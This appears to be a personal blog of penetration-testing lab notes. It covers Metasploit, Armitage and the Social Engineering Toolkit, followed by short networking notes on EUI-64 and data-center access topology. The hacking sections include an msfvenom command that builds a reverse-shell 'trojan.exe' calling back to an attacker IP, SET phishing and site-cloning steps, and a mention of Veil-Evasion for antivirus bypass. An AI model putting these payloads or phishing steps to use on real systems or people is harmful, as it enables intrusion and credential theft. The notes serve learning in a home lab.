Metasploit & Armitage

Armitage is a GUI based Metasploit, it save your time to remember all cli commands in metasploit and visualize scanning results.  Both of the tools are available in kalilinux. If you can use one of them, then you can use the other automaticly.

I tried both, below is the guide to discover all online machine in a subnet by using armigate:

1,  Hosts tab-> clear database

This is to prepare a clean environment for new discovery

2,  Hosts->nmap scan -> quick scan (detect OS) -> input subnet IP for scaning

This will take a couple of minutes to complete depending on how big the subnet is. This step can be finished by using pure nmap command under cli.

After this step, you should be able to see the operation system running on each machine, however it can not recognize windows 10.  By using nmap we would check the way of detecting OS. In short nmap will scan some special ports of the victim and see if those ports are open, especially 139 and 445. If these ports are open, nmap can very likly use them to detecting OS of the victim, more details here.

“One of Nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to itsnmap-os-db database of more than 2,600 known OS fingerprints and prints out the OS details if there is a match. Each fingerprint includes a freeform textual description of the OS, and a classification which provides the vendor name (e.g. Sun), underlying OS (e.g. Solaris), OS generation (e.g. 10), and device type (general purpose, router, switch, game console, etc). Most fingerprints also have a Common Platform Enumeration (CPE) representation, like cpe:/o:linux:linux_kernel:2.6.”

When trying to scan window 10 machine, we can see the message something like ” all ports are filtered”. Below is an example of scanning windows 10 machine:

root@kali:/# nmap -O

Starting Nmap 7.40 ( ) at 2017-10-05 04:58 EDT
Nmap scan report for juhao.lan (
Host is up (0.014s latency).
All 1000 scanned ports on juhao.lan ( are filtered
MAC Address: AC:D1:B8:E4:3F:E7 (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.20 seconds

3, When scanning is completed, all online machine will be listed as icons in the workspace.  we can do attacks -> find attacks to find all possible attacks towards each machines. we can also do attacks -> Hail Mary  to launch massive attacks towards target machines.

Unfortunately I tried Hail Mary towards my windows 7 and window 8.1, no one get compromised. Again it looks like all those attacks in metasploit are already well-known, and can not be a serious threat in the real world.

In order to implement a successful attack, we can also utilize payload in metasploit. I tested that classic payload windows/meterpreter/reverse_tcp

Here is the guide regarding how to generate a vicious .exe code, in short:

# msfvenom -p windows/meterpreter/reverse_tcp  –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=4444 -o /root/Desktop/trojan.exe

Msfvenom is a tool used to generated vicious code for metasploit payload. The code need to be transfered to target machines and runned there in order to create a backdoor towards attackers machine.

The real challenge is actually to send this .exe code to victim machine. I am using my own machine for test but can not even load the code into my machine. I tried by sending myself email, but the email attachment is blocked because google has detected malicious malware in the attachment. I tried to copy the file into USB, but as long as I insert USB into my test machine the malware is removed by windows defender. The author recommended to use some encoder, for example Veil-Evasion to disguise .exe file, need find time to try this.





Social Engineering Toolkit

Tried these tools under kali linux, below are some notes:


Kalilinux image: Kali Linux 64 bit VMware VM, can be downloaded here

VMWARE fusion: 8.5.8

Social Engineering Toolkit

To start up, type:

root@kali:/# setoolkit

main menu is displayed as below:

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

tried 1, go to submenu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules

There are a lot of material regarding SET online, I just did very basic lab for item 2, tried 1 also but without success.

item 1 ->Perform a Mass Email Attack ->15)Custom EXE to VBA (sent via RAR) (RAR required) -> 2) Windows Meterpreter Reverse_TCP

After input LHOST and PORT, I got the following error:

IP address for the payload listener (LHOST):
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443…
[*] All good! The directories were created.
[-] Generating fileformat exploit…

[!] Something went wrong, printing the error: name ‘a’ is not defined

item 2) Website Attack Vectors ->

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu


The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: n
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:

1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo

set:webattack> Select a template:1

Enter the browser exploit you would like to use [8]:

1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
8) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
9) Java Applet JMX Remote Code Execution (2013-01-10)
10) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
11) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
12) Java 7 Applet Remote Code Execution (2012-08-26)
13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
18) Adobe Flash Player Object Type Confusion (2012-05-04)
19) Adobe Flash Player MP4 “cprt” Overflow (2012-02-15)
20) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
21) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
22) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
23) Adobe Flash Player SWF Memory Corruption Vulnerability (2011-04-11)
24) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
25) Internet Explorer CSS Import Use After Free (2010-11-29)
26) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
27) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
28) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
29) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
30) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
31) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
32) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
33) Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow (2010-09-07)
34) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
35) Microsoft Help Center XSS and Command Execution (2010-06-09)
36) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
37) Microsoft Internet Explorer “Aurora” Memory Corruption (2010-01-14)
38) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
39) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
40) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
41) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
42) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
43) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
44) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
46) Metasploit Browser Autopwn (USE AT OWN RISK!)


1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and

By doing this,  kalilinux will build a webserver listening port 8080 by default. What left  is to convince a victim to visit this website. As long as website link is clicked, I can see massive java applets was attempted to be inserted into victim’s machine, and tried to open session towards kalilinux machine. This is the basic example for attack by seducing victim clicking on a vicious link.

Once attack is successful,  in theory I will see active sesssions from Kalilinx by typeing “sessions”

Windows Reverse_TCP Meterpreter is a well-knows way to build a backdoor session with the victim machine. This is the option that have been regarded as high possibility for successful attack. However unfortunately this is no longer the case.  It might be a useful attack towards windows xp when no firewall or defender activated.  When I tried with a victim running windows 8.1 and updated windows defender, Windows defender jumped out and remove the malware immediately, and I got no active session towards victim from my Kalilinux. Especially, we I use chrome or firefox, I can feel that the attempt was protected even by the browsers.

SET is a great tool for learning concepts and ideas for attacking, but very likely that all modules and tools available in SET is not useful to attack in real business world where servers, fws, IDS and other system are fully patched and well protected.




EUI48 vs EUI64

refer to answer here:

Historically, both EUI-48 and MAC-48 were concatenations of a 24-bit OUI (Organizationally Unique Identifier) assigned by the IEEE and a 24-bit extension identifier assigned by the organization with that OUI assignment (NIC). The subtle difference between EUI-48 and MAC-48 was not well understood; as a result, the term MAC-48 is now obsolete and the term EUI-48 is used for both (but the terms “MAC” and “MAC address” are still used).

In other words, EUI-48 and the MAC number of a device represent the same thing! Usually it is represented in 12 hex (e.g. 0023.a34e.abc9), equivalent to 48 bits or 6 bytes.

By implementing the EUI-64 (64-bit Extended Unique Identifier format), a host can automatically assign itself a unique 64-bit IPv6 interface identifier without the need for manual configuration or DHCP. So it’s an IPv6 matter. Anyway, if you are interested about how it’s calculated, it is applied to a MAC address like this:

The 48-bit MAC address is split in half, the hex group FFFE is inserted in the middle (after the 24th bit), and the seventh bit is inverted.


The MAC address    0021.86b5.6e10      (48 bit) becomes 
the EUI-64 address 0221.86ff.feb5.6e10 (64 bit)

Access layer design

refer to

1, Looped triangle

The triangle looped topology is currently the most widely implemented in the enterprise data center. This topology provides a deterministic design that makes it easy to troubleshoot while providing a high level of flexibility

2, looped square

The square-based looped topology is not as common today in the enterprise data center but has recently gained more interest. The square looped topology increases the access layer switch density when compared to a triangle loop topology while retaining the same loop topology characteristics. This becomes particularly important when 10GE uplinks are used. This topology is very similar to the triangle loop topology, with differences in where spanning tree blocking occurs

Spanning tree blocks the link between the access layer switches, with the lowest cost path to root being via the uplinks to the aggregation switches, as shown in Figure 6-9. This allows both uplinks to be active to the aggregation layer switches while providing a backup path in the event of an uplink failure. The backup path can also be a lower bandwidth path because it is used only in a backup situation. This might also permit configurations such as 10GE uplinks with GEC backup.

The possible disadvantages of the square loop design relate to inter-switch link use, because 50 percent of access layer traffic might cross the inter-switch link to reach the default gateway/active service module. There can also be degradation in performance in the event of an uplink failure because, in this case, the oversubscription ratio doubles.

3, Loop free U

4, Loop free invented U